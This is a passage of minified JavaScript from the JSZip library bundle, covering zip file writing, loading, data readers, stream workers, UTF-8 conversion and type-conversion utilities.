Ie+="\n\0",Ie+=Q(J,2),Ie+=se.magic,Ie+=Q(U,2),Ie+=Q(K,2),Ie+=Q(R.crc32,4),Ie+=Q(R.compressedSize,4),Ie+=Q(R.uncompressedSize,4),Ie+=Q(le.length,2),Ie+=Q(P.length,2),{fileRecord:y.LOCAL_FILE_HEADER+Ie+le+P,dirRecord:y.CENTRAL_FILE_HEADER+Q(ue,2)+Ie+Q(l.length,2)+"\0\0\0\0"+Q(Z,4)+Q(x,4)+le+P+l}}var E=$("../utils"),g=$("../stream/GenericWorker"),b=$("../utf8"),_=$("../crc32"),y=$("../signature");function M(p,D,w,x){g.call(this,"ZipFileWorker"),this.bytesWritten=0,this.zipComment=D,this.zipPlatform=w,this.encodeFileName=x,this.streamFiles=p,this.accumulate=!1,this.contentBuffer=[],this.dirRecords=[],this.currentSourceOffset=0,this.entriesCount=0,this.currentFile=null,this._sources=[]}E.inherits(M,g),M.prototype.push=function(p){var D=p.meta.percent||0,w=this.entriesCount,x=this._sources.length;this.accumulate?this.contentBuffer.push(p):(this.bytesWritten+=p.data.length,g.prototype.push.call(this,{data:p.data,meta:{currentFile:this.currentFile,percent:w?(D+100*(w-x-1))/w:100}}))},M.prototype.openedSource=function(p){this.currentSourceOffset=this.bytesWritten,this.currentFile=p.file.name;var D=this.streamFiles&&!p.file.dir;if(D){var w=F(p,D,!1,this.currentSourceOffset,this.zipPlatform,this.encodeFileName);this.push({data:w.fileRecord,meta:{percent:0}})}else this.accumulate=!0},M.prototype.closedSource=function(p){this.accumulate=!1;var x,D=this.streamFiles&&!p.file.dir,w=F(p,D,!0,this.currentSourceOffset,this.zipPlatform,this.encodeFileName);if(this.dirRecords.push(w.dirRecord),D)this.push({data:(x=p,y.DATA_DESCRIPTOR+Q(x.crc32,4)+Q(x.compressedSize,4)+Q(x.uncompressedSize,4)),meta:{percent:100}});else for(this.push({data:w.fileRecord,meta:{percent:0}});this.contentBuffer.length;)this.push(this.contentBuffer.shift());this.currentFile=null},M.prototype.flush=function(){for(var p=this.bytesWritten,D=0;D<this.dirRecords.length;D++)this.push({data:this.dirRecords[D],meta:{percent:100}});var S,O,U,se,x=(S=this.dirRecords.length,O=this.bytesWritten-p,U=p,se=E.transformTo("string",(0,this.encodeFileName)(this.zipComment)),y.CENTRAL_DIRECTORY_END+"\0\0\0\0"+Q(S,2)+Q(S,2)+Q(O,4)+Q(U,4)+Q(se.length,2)+se);this.push({data:x,meta:{percent:100}})},M.prototype.prepareNextSource=function(){this.previous=this._sources.shift(),this.openedSource(this.previous.streamInfo),this.isPaused?this.previous.pause():this.previous.resume()},M.prototype.registerPrevious=function(p){this._sources.push(p);var D=this;return p.on("data",function(w){D.processChunk(w)}),p.on("end",function(){D.closedSource(D.previous.streamInfo),D._sources.length?D.prepareNextSource():D.end()}),p.on("error",function(w){D.error(w)}),this},M.prototype.resume=function(){return!!g.prototype.resume.call(this)&&(!this.previous&&this._sources.length?(this.prepareNextSource(),!0):this.previous||this._sources.length||this.generatedError?void 0:(this.end(),!0))},M.prototype.error=function(p){var D=this._sources;if(!g.prototype.error.call(this,p))return!1;for(var w=0;w<D.length;w++)try{D[w].error(p)}catch(x){}return!0},M.prototype.lock=function(){g.prototype.lock.call(this);for(var p=this._sources,D=0;D<p.length;D++)p[D].lock()},ae.exports=M},{"../crc32":4,"../signature":23,"../stream/GenericWorker":28,"../utf8":31,"../utils":32}],9:[function($,ae,I){"use strict";var Q=$("../compressions"),F=$("./ZipFileWorker");I.generateWorker=function(E,g,b){var _=new F(g.streamFiles,b,g.platform,g.encodeFileName),y=0;try{E.forEach(function(M,p){y++;var D=function(O,U){var K=O||U,ee=Q[K];if(!ee)throw new Error(K+" is not a valid compression method !");return ee}(p.options.compression,g.compression),x=p.dir,S=p.date;p._compressWorker(D,p.options.compressionOptions||g.compressionOptions||{}).withStreamInfo("file",{name:M,dir:x,date:S,comment:p.comment||"",unixPermissions:p.unixPermissions,dosPermissions:p.dosPermissions}).pipe(_)}),_.entriesCount=y}catch(M){_.error(M)}return _}},{"../compressions":3,"./ZipFileWorker":8}],10:[function($,ae,I){"use strict";function Q(){if(!(this instanceof Q))return new Q;if(arguments.length)throw new Error("The constructor with parameters has been removed in JSZip 3.0, please check the upgrade guide.");this.files=Object.create(null),this.comment=null,this.root="",this.clone=function(){var F=new Q;for(var E in this)"function"!=typeof this[E]&&(F[E]=this[E]);return F}}(Q.prototype=$("./object")).loadAsync=$("./load"),Q.support=$("./support"),Q.defaults=$("./defaults"),Q.version="3.10.1",Q.loadAsync=function(F,E){return(new Q).loadAsync(F,E)},Q.external=$("./external"),ae.exports=Q},{"./defaults":5,"./external":6,"./load":11,"./object":15,"./support":30}],11:[function($,ae,I){"use strict";var Q=$("./utils"),F=$("./external"),E=$("./utf8"),g=$("./zipEntries"),b=$("./stream/Crc32Probe"),_=$("./nodejsUtils");function y(M){return new F.Promise(function(p,D){var w=M.decompressed.getContentWorker().pipe(new b);w.on("error",function(x){D(x)}).on("end",function(){w.streamInfo.crc32!==M.decompressed.crc32?D(new Error("Corrupted zip : CRC32 mismatch")):p()}).resume()})}ae.exports=function(M,p){var D=this;return p=Q.extend(p||{},{base64:!1,checkCRC32:!1,optimizedBinaryString:!1,createFolders:!1,decodeFileName:E.utf8decode}),_.isNode&&_.isStream(M)?F.Promise.reject(new Error("JSZip can't accept a stream when loading a zip file.")):Q.prepareContent("the loaded zip file",M,!0,p.optimizedBinaryString,p.base64).then(function(w){var x=new g(p);return x.load(w),x}).then(function(w){var x=[F.Promise.resolve(w)],S=w.files;if(p.checkCRC32)for(var O=0;O<S.length;O++)x.push(y(S[O]));return F.Promise.all(x)}).then(function(w){for(var x=w.shift(),S=x.files,O=0;O<S.length;O++){var U=S[O],K=U.fileNameStr,ee=Q.resolve(U.fileNameStr);D.file(ee,U.decompressed,{binary:!0,optimizedBinaryString:!0,date:U.date,dir:U.dir,comment:U.fileCommentStr.length?U.fileCommentStr:null,unixPermissions:U.unixPermissions,dosPermissions:U.dosPermissions,createFolders:p.createFolders}),U.dir||(D.file(ee).unsafeOriginalName=K)}return x.zipComment.length&&(D.comment=x.zipComment),D})}},{"./external":6,"./nodejsUtils":14,"./stream/Crc32Probe":25,"./utf8":31,"./utils":32,"./zipEntries":33}],12:[function($,ae,I){"use strict";var Q=$("../utils"),F=$("../stream/GenericWorker");function E(g,b){F.call(this,"Nodejs stream input adapter for "+g),this._upstreamEnded=!1,this._bindStream(b)}Q.inherits(E,F),E.prototype._bindStream=function(g){var b=this;(this._stream=g).pause(),g.on("data",function(_){b.push({data:_,meta:{percent:0}})}).on("error",function(_){b.isPaused?this.generatedError=_:b.error(_)}).on("end",function(){b.isPaused?b._upstreamEnded=!0:b.end()})},E.prototype.pause=function(){return!!F.prototype.pause.call(this)&&(this._stream.pause(),!0)},E.prototype.resume=function(){return!!F.prototype.resume.call(this)&&(this._upstreamEnded?this.end():this._stream.resume(),!0)},ae.exports=E},{"../stream/GenericWorker":28,"../utils":32}],13:[function($,ae,I){"use strict";var Q=$("readable-stream").Readable;function F(E,g,b){Q.call(this,g),this._helper=E;var _=this;E.on("data",function(y,M){_.push(y)||_._helper.pause(),b&&b(M)}).on("error",function(y){_.emit("error",y)}).on("end",function(){_.push(null)})}$("../utils").inherits(F,Q),F.prototype._read=function(){this._helper.resume()},ae.exports=F},{"../utils":32,"readable-stream":16}],14:[function($,ae,I){"use strict";ae.exports={isNode:void 0!==ie,newBufferFrom:function(Q,F){if(ie.from&&ie.from!==Uint8Array.from)return ie.from(Q,F);if("number"==typeof Q)throw new Error('The "data" argument must not be a number');return new ie(Q,F)},allocBuffer:function(Q){if(ie.alloc)return ie.alloc(Q);var F=new ie(Q);return F.fill(0),F},isBuffer:function(Q){return ie.isBuffer(Q)},isStream:function(Q){return Q&&"function"==typeof Q.on&&"function"==typeof Q.pause&&"function"==typeof Q.resume}}},{}],15:[function($,ae,I){"use strict";function Q(ee,se,ve){var le,ye=E.getTypeOf(se),z=E.extend(ve||{},_);z.date=z.date||new Date,null!==z.compression&&(z.compression=z.compression.toUpperCase()),"string"==typeof z.unixPermissions&&(z.unixPermissions=parseInt(z.unixPermissions,8)),z.unixPermissions&&16384&z.unixPermissions&&(z.dir=!0),z.dosPermissions&&16&z.dosPermissions&&(z.dir=!0),z.dir&&(ee=S(ee)),z.createFolders&&(le=x(ee))&&O.call(this,le,!0),ve&&void 0!==ve.binary||(z.binary=!("string"===ye&&!1===z.binary&&!1===z.base64)),(se instanceof y&&0===se.uncompressedSize||z.dir||!se||0===se.length)&&(z.base64=!1,z.binary=!0,se="",z.compression="STORE",ye="string");var f;f=se instanceof y||se instanceof g?se:D.isNode&&D.isStream(se)?new w(ee,se):E.prepareContent(ee,se,z.binary,z.optimizedBinaryString,z.base64);var A=new M(ee,f,z);this.files[ee]=A}var F=$("./utf8"),E=$("./utils"),g=$("./stream/GenericWorker"),b=$("./stream/StreamHelper"),_=$("./defaults"),y=$("./compressedObject"),M=$("./zipObject"),p=$("./generate"),D=$("./nodejsUtils"),w=$("./nodejs/NodejsStreamInputAdapter"),x=function(ee){"/"===ee.slice(-1)&&(ee=ee.substring(0,ee.length-1));var se=ee.lastIndexOf("/");return 0<se?ee.substring(0,se):""},S=function(ee){return"/"!==ee.slice(-1)&&(ee+="/"),ee},O=function(ee,se){return se=void 0!==se?se:_.createFolders,ee=S(ee),this.files[ee]||Q.call(this,ee,null,{dir:!0,createFolders:se}),this.files[ee]};function U(ee){return"[object RegExp]"===Object.prototype.toString.call(ee)}var K={load:function(){throw new Error("This method has been removed in JSZip 3.0, please check the upgrade guide.")},forEach:function(ee){var se,ve,le;for(se in this.files)le=this.files[se],(ve=se.slice(this.root.length,se.length))&&se.slice(0,this.root.length)===this.root&&ee(ve,le)},filter:function(ee){var se=[];return this.forEach(function(ve,le){ee(ve,le)&&se.push(le)}),se},file:function(ee,se,ve){if(1!==arguments.length)return Q.call(this,ee=this.root+ee,se,ve),this;if(U(ee)){var le=ee;return this.filter(function(z,l){return!l.dir&&le.test(z)})}var ye=this.files[this.root+ee];return ye&&!ye.dir?ye:null},folder:function(ee){if(!ee)return this;if(U(ee))return this.filter(function(ye,z){return z.dir&&ee.test(ye)});var ve=O.call(this,this.root+ee),le=this.clone();return le.root=ve.name,le},remove:function(ee){var se=this.files[ee=this.root+ee];if(se||("/"!==ee.slice(-1)&&(ee+="/"),se=this.files[ee]),se&&!se.dir)delete this.files[ee];else for(var ve=this.filter(function(ye,z){return z.name.slice(0,ee.length)===ee}),le=0;le<ve.length;le++)delete this.files[ve[le].name];return this},generate:function(){throw new Error("This method has been removed in JSZip 3.0, please check the upgrade guide.")},generateInternalStream:function(ee){var se,ve={};try{if((ve=E.extend(ee||{},{streamFiles:!1,compression:"STORE",compressionOptions:null,type:"",platform:"DOS",comment:null,mimeType:"application/zip",encodeFileName:F.utf8encode})).type=ve.type.toLowerCase(),ve.compression=ve.compression.toUpperCase(),"binarystring"===ve.type&&(ve.type="string"),!ve.type)throw new Error("No output type specified.");E.checkSupport(ve.type),"darwin"!==ve.platform&&"freebsd"!==ve.platform&&"linux"!==ve.platform&&"sunos"!==ve.platform||(ve.platform="UNIX"),"win32"===ve.platform&&(ve.platform="DOS"),se=p.generateWorker(this,ve,ve.comment||this.comment||"")}catch(ye){(se=new g("error")).error(ye)}return new b(se,ve.type||"string",ve.mimeType)},generateAsync:function(ee,se){return this.generateInternalStream(ee).accumulate(se)},generateNodeStream:function(ee,se){return(ee=ee||{}).type||(ee.type="nodebuffer"),this.generateInternalStream(ee).toNodejsStream(se)}};ae.exports=K},{"./compressedObject":2,"./defaults":5,"./generate":9,"./nodejs/NodejsStreamInputAdapter":12,"./nodejsUtils":14,"./stream/GenericWorker":28,"./stream/StreamHelper":29,"./utf8":31,"./utils":32,"./zipObject":35}],16:[function($,ae,I){"use strict";ae.exports=$("stream")},{stream:void 0}],17:[function($,ae,I){"use strict";var Q=$("./DataReader");function F(E){Q.call(this,E);for(var g=0;g<this.data.length;g++)E[g]=255&E[g]}$("../utils").inherits(F,Q),F.prototype.byteAt=function(E){return this.data[this.zero+E]},F.prototype.lastIndexOfSignature=function(E){for(var g=E.charCodeAt(0),b=E.charCodeAt(1),_=E.charCodeAt(2),y=E.charCodeAt(3),M=this.length-4;0<=M;--M)if(this.data[M]===g&&this.data[M+1]===b&&this.data[M+2]===_&&this.data[M+3]===y)return M-this.zero;return-1},F.prototype.readAndCheckSignature=function(E){var g=E.charCodeAt(0),b=E.charCodeAt(1),_=E.charCodeAt(2),y=E.charCodeAt(3),M=this.readData(4);return g===M[0]&&b===M[1]&&_===M[2]&&y===M[3]},F.prototype.readData=function(E){if(this.checkOffset(E),0===E)return[];var g=this.data.slice(this.zero+this.index,this.zero+this.index+E);return this.index+=E,g},ae.exports=F},{"../utils":32,"./DataReader":18}],18:[function($,ae,I){"use strict";var Q=$("../utils");function F(E){this.data=E,this.length=E.length,this.index=0,this.zero=0}F.prototype={checkOffset:function(E){this.checkIndex(this.index+E)},checkIndex:function(E){if(this.length<this.zero+E||E<0)throw new Error("End of data reached (data length = "+this.length+", asked index = "+E+"). Corrupted zip ?")},setIndex:function(E){this.checkIndex(E),this.index=E},skip:function(E){this.setIndex(this.index+E)},byteAt:function(){},readInt:function(E){var g,b=0;for(this.checkOffset(E),g=this.index+E-1;g>=this.index;g--)b=(b<<8)+this.byteAt(g);return this.index+=E,b},readString:function(E){return Q.transformTo("string",this.readData(E))},readData:function(){},lastIndexOfSignature:function(){},readAndCheckSignature:function(){},readDate:function(){var E=this.readInt(4);return new Date(Date.UTC(1980+(E>>25&127),(E>>21&15)-1,E>>16&31,E>>11&31,E>>5&63,(31&E)<<1))}},ae.exports=F},{"../utils":32}],19:[function($,ae,I){"use strict";var Q=$("./Uint8ArrayReader");function F(E){Q.call(this,E)}$("../utils").inherits(F,Q),F.prototype.readData=function(E){this.checkOffset(E);var g=this.data.slice(this.zero+this.index,this.zero+this.index+E);return this.index+=E,g},ae.exports=F},{"../utils":32,"./Uint8ArrayReader":21}],20:[function($,ae,I){"use strict";var Q=$("./DataReader");function F(E){Q.call(this,E)}$("../utils").inherits(F,Q),F.prototype.byteAt=function(E){return this.data.charCodeAt(this.zero+E)},F.prototype.lastIndexOfSignature=function(E){return this.data.lastIndexOf(E)-this.zero},F.prototype.readAndCheckSignature=function(E){return E===this.readData(4)},F.prototype.readData=function(E){this.checkOffset(E);var g=this.data.slice(this.zero+this.index,this.zero+this.index+E);return this.index+=E,g},ae.exports=F},{"../utils":32,"./DataReader":18}],21:[function($,ae,I){"use strict";var Q=$("./ArrayReader");function F(E){Q.call(this,E)}$("../utils").inherits(F,Q),F.prototype.readData=function(E){if(this.checkOffset(E),0===E)return new Uint8Array(0);var g=this.data.subarray(this.zero+this.index,this.zero+this.index+E);return this.index+=E,g},ae.exports=F},{"../utils":32,"./ArrayReader":17}],22:[function($,ae,I){"use strict";var Q=$("../utils"),F=$("../support"),E=$("./ArrayReader"),g=$("./StringReader"),b=$("./NodeBufferReader"),_=$("./Uint8ArrayReader");ae.exports=function(y){var M=Q.getTypeOf(y);return Q.checkSupport(M),"string"!==M||F.uint8array?"nodebuffer"===M?new b(y):F.uint8array?new _(Q.transformTo("uint8array",y)):new E(Q.transformTo("array",y)):new g(y)}},{"../support":30,"../utils":32,"./ArrayReader":17,"./NodeBufferReader":19,"./StringReader":20,"./Uint8ArrayReader":21}],23:[function($,ae,I){"use strict";I.LOCAL_FILE_HEADER="PK\x03\x04",I.CENTRAL_FILE_HEADER="PK\x01\x02",I.CENTRAL_DIRECTORY_END="PK\x05\x06",I.ZIP64_CENTRAL_DIRECTORY_LOCATOR="PK\x06\x07",I.ZIP64_CENTRAL_DIRECTORY_END="PK\x06\x06",I.DATA_DESCRIPTOR="PK\x07\b"},{}],24:[function($,ae,I){"use strict";var Q=$("./GenericWorker"),F=$("../utils");function E(g){Q.call(this,"ConvertWorker to "+g),this.destType=g}F.inherits(E,Q),E.prototype.processChunk=function(g){this.push({data:F.transformTo(this.destType,g.data),meta:g.meta})},ae.exports=E},{"../utils":32,"./GenericWorker":28}],25:[function($,ae,I){"use strict";var Q=$("./GenericWorker"),F=$("../crc32");function E(){Q.call(this,"Crc32Probe"),this.withStreamInfo("crc32",0)}$("../utils").inherits(E,Q),E.prototype.processChunk=function(g){this.streamInfo.crc32=F(g.data,this.streamInfo.crc32||0),this.push(g)},ae.exports=E},{"../crc32":4,"../utils":32,"./GenericWorker":28}],26:[function($,ae,I){"use strict";var Q=$("../utils"),F=$("./GenericWorker");function E(g){F.call(this,"DataLengthProbe for "+g),this.propName=g,this.withStreamInfo(g,0)}Q.inherits(E,F),E.prototype.processChunk=function(g){g&&(this.streamInfo[this.propName]=(this.streamInfo[this.propName]||0)+g.data.length),F.prototype.processChunk.call(this,g)},ae.exports=E},{"../utils":32,"./GenericWorker":28}],27:[function($,ae,I){"use strict";var Q=$("../utils"),F=$("./GenericWorker");function E(g){F.call(this,"DataWorker");var b=this;this.dataIsReady=!1,this.index=0,this.max=0,this.data=null,this.type="",this._tickScheduled=!1,g.then(function(_){b.dataIsReady=!0,b.data=_,b.max=_&&_.length||0,b.type=Q.getTypeOf(_),b.isPaused||b._tickAndRepeat()},function(_){b.error(_)})}Q.inherits(E,F),E.prototype.cleanUp=function(){F.prototype.cleanUp.call(this),this.data=null},E.prototype.resume=function(){return!!F.prototype.resume.call(this)&&(!this._tickScheduled&&this.dataIsReady&&(this._tickScheduled=!0,Q.delay(this._tickAndRepeat,[],this)),!0)},E.prototype._tickAndRepeat=function(){this._tickScheduled=!1,this.isPaused||this.isFinished||(this._tick(),this.isFinished||(Q.delay(this._tickAndRepeat,[],this),this._tickScheduled=!0))},E.prototype._tick=function(){if(this.isPaused||this.isFinished)return!1;var g=null,b=Math.min(this.max,this.index+16384);if(this.index>=this.max)return this.end();switch(this.type){case"string":g=this.data.substring(this.index,b);break;case"uint8array":g=this.data.subarray(this.index,b);break;case"array":case"nodebuffer":g=this.data.slice(this.index,b)}return this.index=b,this.push({data:g,meta:{percent:this.max?this.index/this.max*100:0}})},ae.exports=E},{"../utils":32,"./GenericWorker":28}],28:[function($,ae,I){"use strict";function Q(F){this.name=F||"default",this.streamInfo={},this.generatedError=null,this.extraStreamInfo={},this.isPaused=!0,this.isFinished=!1,this.isLocked=!1,this._listeners={data:[],end:[],error:[]},this.previous=null}Q.prototype={push:function(F){this.emit("data",F)},end:function(){if(this.isFinished)return!1;this.flush();try{this.emit("end"),this.cleanUp(),this.isFinished=!0}catch(F){this.emit("error",F)}return!0},error:function(F){return!this.isFinished&&(this.isPaused?this.generatedError=F:(this.isFinished=!0,this.emit("error",F),this.previous&&this.previous.error(F),this.cleanUp()),!0)},on:function(F,E){return this._listeners[F].push(E),this},cleanUp:function(){this.streamInfo=this.generatedError=this.extraStreamInfo=null,this._listeners=[]},emit:function(F,E){if(this._listeners[F])for(var g=0;g<this._listeners[F].length;g++)this._listeners[F][g].call(this,E)},pipe:function(F){return F.registerPrevious(this)},registerPrevious:function(F){if(this.isLocked)throw new Error("The stream '"+this+"' has already been used.");this.streamInfo=F.streamInfo,this.mergeStreamInfo(),this.previous=F;var E=this;return F.on("data",function(g){E.processChunk(g)}),F.on("end",function(){E.end()}),F.on("error",function(g){E.error(g)}),this},pause:function(){return!this.isPaused&&!this.isFinished&&(this.isPaused=!0,this.previous&&this.previous.pause(),!0)},resume:function(){if(!this.isPaused||this.isFinished)return!1;var F=this.isPaused=!1;return this.generatedError&&(this.error(this.generatedError),F=!0),this.previous&&this.previous.resume(),!F},flush:function(){},processChunk:function(F){this.push(F)},withStreamInfo:function(F,E){return this.extraStreamInfo[F]=E,this.mergeStreamInfo(),this},mergeStreamInfo:function(){for(var F in this.extraStreamInfo)Object.prototype.hasOwnProperty.call(this.extraStreamInfo,F)&&(this.streamInfo[F]=this.extraStreamInfo[F])},lock:function(){if(this.isLocked)throw new Error("The stream '"+this+"' has already been used.");this.isLocked=!0,this.previous&&this.previous.lock()},toString:function(){var F="Worker "+this.name;return this.previous?this.previous+" -> "+F:F}},ae.exports=Q},{}],29:[function($,ae,I){"use strict";var Q=$("../utils"),F=$("./ConvertWorker"),E=$("./GenericWorker"),g=$("../base64"),b=$("../support"),_=$("../external"),y=null;if(b.nodestream)try{y=$("../nodejs/NodejsStreamOutputAdapter")}catch(D){}function p(D,w,x){var S=w;switch(w){case"blob":case"arraybuffer":S="uint8array";break;case"base64":S="string"}try{this._internalType=S,this._outputType=w,this._mimeType=x,Q.checkSupport(S),this._worker=D.pipe(new F(S)),D.lock()}catch(O){this._worker=new E("error"),this._worker.error(O)}}p.prototype={accumulate:function(D){return function M(D,w){return new _.Promise(function(x,S){var O=[],U=D._internalType,K=D._outputType,ee=D._mimeType;D.on("data",function(se,ve){O.push(se),w&&w(ve)}).on("error",function(se){O=[],S(se)}).on("end",function(){try{var se=function(ve,le,ye){switch(ve){case"blob":return Q.newBlob(Q.transformTo("arraybuffer",le),ye);case"base64":return g.encode(le);default:return Q.transformTo(ve,le)}}(K,function(ve,le){var ye,z=0,l=null,f=0;for(ye=0;ye<le.length;ye++)f+=le[ye].length;switch(ve){case"string":return le.join("");case"array":return Array.prototype.concat.apply([],le);case"uint8array":for(l=new Uint8Array(f),ye=0;ye<le.length;ye++)l.set(le[ye],z),z+=le[ye].length;return l;case"nodebuffer":return ie.concat(le);default:throw new Error("concat : unsupported type '"+ve+"'")}}(U,O),ee);x(se)}catch(ve){S(ve)}O=[]}).resume()})}(this,D)},on:function(D,w){var x=this;return this._worker.on(D,"data"===D?function(S){w.call(x,S.data,S.meta)}:function(){Q.delay(w,arguments,x)}),this},resume:function(){return Q.delay(this._worker.resume,[],this._worker),this},pause:function(){return this._worker.pause(),this},toNodejsStream:function(D){if(Q.checkSupport("nodestream"),"nodebuffer"!==this._outputType)throw new Error(this._outputType+" is not supported by this method");return new y(this,{objectMode:"nodebuffer"!==this._outputType},D)}},ae.exports=p},{"../base64":1,"../external":6,"../nodejs/NodejsStreamOutputAdapter":13,"../support":30,"../utils":32,"./ConvertWorker":24,"./GenericWorker":28}],30:[function($,ae,I){"use strict";if(I.base64=!0,I.array=!0,I.string=!0,I.arraybuffer="undefined"!=typeof ArrayBuffer&&"undefined"!=typeof Uint8Array,I.nodebuffer=void 0!==ie,I.uint8array="undefined"!=typeof Uint8Array,"undefined"==typeof ArrayBuffer)I.blob=!1;else{var Q=new ArrayBuffer(0);try{I.blob=0===new Blob([Q],{type:"application/zip"}).size}catch(E){try{var F=new(self.BlobBuilder||self.WebKitBlobBuilder||self.MozBlobBuilder||self.MSBlobBuilder);F.append(Q),I.blob=0===F.getBlob("application/zip").size}catch(g){I.blob=!1}}}try{I.nodestream=!!$("readable-stream").Readable}catch(E){I.nodestream=!1}},{"readable-stream":16}],31:[function($,ae,I){"use strict";for(var Q=$("./utils"),F=$("./support"),E=$("./nodejsUtils"),g=$("./stream/GenericWorker"),b=new Array(256),_=0;_<256;_++)b[_]=252<=_?6:248<=_?5:240<=_?4:224<=_?3:192<=_?2:1;function y(){g.call(this,"utf-8 decode"),this.leftOver=null}function M(){g.call(this,"utf-8 encode")}b[254]=b[254]=1,I.utf8encode=function(p){return F.nodebuffer?E.newBufferFrom(p,"utf-8"):function(D){var w,x,S,O,U,K=D.length,ee=0;for(O=0;O<K;O++)55296==(64512&(x=D.charCodeAt(O)))&&O+1<K&&56320==(64512&(S=D.charCodeAt(O+1)))&&(x=65536+(x-55296<<10)+(S-56320),O++),ee+=x<128?1:x<2048?2:x<65536?3:4;for(w=F.uint8array?new Uint8Array(ee):new Array(ee),O=U=0;U<ee;O++)55296==(64512&(x=D.charCodeAt(O)))&&O+1<K&&56320==(64512&(S=D.charCodeAt(O+1)))&&(x=65536+(x-55296<<10)+(S-56320),O++),x<128?w[U++]=x:(x<2048?w[U++]=192|x>>>6:(x<65536?w[U++]=224|x>>>12:(w[U++]=240|x>>>18,w[U++]=128|x>>>12&63),w[U++]=128|x>>>6&63),w[U++]=128|63&x);return w}(p)},I.utf8decode=function(p){return F.nodebuffer?Q.transformTo("nodebuffer",p).toString("utf-8"):function(D){var w,x,S,O,U=D.length,K=new Array(2*U);for(w=x=0;w<U;)if((S=D[w++])<128)K[x++]=S;else if(4<(O=b[S]))K[x++]=65533,w+=O-1;else{for(S&=2===O?31:3===O?15:7;1<O&&w<U;)S=S<<6|63&D[w++],O--;1<O?K[x++]=65533:S<65536?K[x++]=S:(K[x++]=55296|(S-=65536)>>10&1023,K[x++]=56320|1023&S)}return K.length!==x&&(K.subarray?K=K.subarray(0,x):K.length=x),Q.applyFromCharCode(K)}(p=Q.transformTo(F.uint8array?"uint8array":"array",p))},Q.inherits(y,g),y.prototype.processChunk=function(p){var D=Q.transformTo(F.uint8array?"uint8array":"array",p.data);if(this.leftOver&&this.leftOver.length){if(F.uint8array){var w=D;(D=new Uint8Array(w.length+this.leftOver.length)).set(this.leftOver,0),D.set(w,this.leftOver.length)}else D=this.leftOver.concat(D);this.leftOver=null}var x=function(O,U){var K;for((U=U||O.length)>O.length&&(U=O.length),K=U-1;0<=K&&128==(192&O[K]);)K--;return K<0||0===K?U:K+b[O[K]]>U?K:U}(D),S=D;x!==D.length&&(F.uint8array?(S=D.subarray(0,x),this.leftOver=D.subarray(x,D.length)):(S=D.slice(0,x),this.leftOver=D.slice(x,D.length))),this.push({data:I.utf8decode(S),meta:p.meta})},y.prototype.flush=function(){this.leftOver&&this.leftOver.length&&(this.push({data:I.utf8decode(this.leftOver),meta:{}}),this.leftOver=null)},I.Utf8DecodeWorker=y,Q.inherits(M,g),M.prototype.processChunk=function(p){this.push({data:I.utf8encode(p.data),meta:p.meta})},I.Utf8EncodeWorker=M},{"./nodejsUtils":14,"./stream/GenericWorker":28,"./support":30,"./utils":32}],32:[function($,ae,I){"use strict";var Q=$("./support"),F=$("./base64"),E=$("./nodejsUtils"),g=$("./external");function b(w){return w}function _(w,x){for(var S=0;S<w.length;++S)x[S]=255&w.charCodeAt(S);return x}$("setimmediate"),I.newBlob=function(w,x){I.checkSupport("blob");try{return new Blob([w],{type:x})}catch(O){try{var S=new(self.BlobBuilder||self.WebKitBlobBuilder||self.MozBlobBuilder||self.MSBlobBuilder);return S.append(w),S.getBlob(x)}catch(U){throw new Error("Bug : can't construct the Blob.")}}};var y={stringifyByChunk:function(w,x,S){var O=[],U=0,K=w.length;if(K<=S)return String.fromCharCode.apply(null,w);for(;U<K;)O.push(String.fromCharCode.apply(null,"array"===x||"nodebuffer"===x?w.slice(U,Math.min(U+S,K)):w.subarray(U,Math.min(U+S,K)))),U+=S;return O.join("")},stringifyByChar:function(w){for(var x="",S=0;S<w.length;S++)x+=String.fromCharCode(w[S]);return x},applyCanBeUsed:{uint8array:function(){try{return Q.uint8array&&1===String.fromCharCode.apply(null,new Uint8Array(1)).length}catch(w){return!1}}(),nodebuffer:function(){try{return Q.nodebuffer&&1===String.fromCharCode.apply(null,E.allocBuffer(1)).length}catch(w){return!1}}()}};function M(w){var x=65536,S=I.getTypeOf(w),O=!0;if("uint8array"===S?O=y.applyCanBeUsed.uint8array:"nodebuffer"===S&&(O=y.applyCanBeUsed.nodebuffer),O)for(;1<x;)try{return y.stringifyByChunk(w,S,x)}catch(U){x=Math.floor(x/2)}return y.stringifyByChar(w)}function p(w,x){for(var S=0;S<w.length;S++)x[S]=w[S];return x}I.applyFromCharCode=M;var D={};D.string={string:b,array:function(w){return _(w,new Array(w.length))},arraybuffer:function(w){return D.string.uint8array(w).buffer},uint8array:function(w){return _(w,new Uint8Array(w.length))},nodebuffer:function(w){return _(w,E.allocBuffer(w.length))}},D.array={string:M,array:b,arraybuffer:function(w){return new Uint8Array(w).buffer},uint8array:function(w){return new Uint8Array(w)},nodebuffer:function(w){return E.newBufferFrom(w)}},D.arraybuffer={string:function(w){return M(new Uint8Array(w))},array:function(w){return p(new Uint8Array(w),new Array(w.byteLength))},arraybuffer:b,uint8array:function(w){return new Uint8Array(w)},nodebuffer:function(w){return E.newBufferFrom(new Uint8Array(w))}},D.uint8array={string:M,array:function(w){return p(w,new Array(w.length))},arraybuffer:function(w){return w.buffer},uint8array:b,nodebuffer:function(w){return E.newBufferFrom(w)}},D.nodebuffer={string:M,array:function(w){return p(w,new Array(w.length))},arraybuffer:function(w){return D.nodebuffer.uint8array(w).buffer},uint8array:function(w){return p(w,new Uint8Array(w.length))},nodebuffer:b},I.transformTo=function(w,x){if(x=x||"",!w)return x;I.checkSupport(w);var S=I.getTypeOf(x);return D[S][w](x)},I.resolve=function(w){for(var x=w.split("/"),S=[],O=0;O<x.length;O++){var U=x[O];"."===U||""===U&&0!==O&&O!==x.length-1||(".."===U?S.pop():S.push(U))}return S.join("/")},I.getTypeOf=function(w){return"string"==typeof w?"string":"[object Array]"===Object.prototype.toString.call(w)?"array":Q.nodebuffer&&E.isBuffer(w)?"nodebuffer":Q.uint8array&&w instanceof Uint8Array?"uint8array":Q.arraybuffer&&w instanceof ArrayBuffer?"arraybuffer":void 0},I.checkSupport=function(w){if(!Q[w.toLowerCase()])throw new Error(w+" is not supported by this platform")},I.MAX_VALUE_16BITS=65535,I.MAX_VALUE_32BITS=-1,I.pretty=function(w){var x,S,O="";for(S=0;S<(w||"").length;S++)O+="\\x"+((x=w.charCodeAt(S))<16?"0":"")+x.toString(16).toUpperCase();return O},I.delay=function(w,x,S){setImmediate(function(){w.apply(S||null,x||[])})},I.inherits=function(w,x){function S(){}S.prototype=x.prototype,w.prototype=new S},I.extend=function(){var w,x,S={};for(w=0;w<arguments.length;w++)for(x in arguments[w])Object.prototype.hasOwnProperty.call(arguments[w],x)&&void 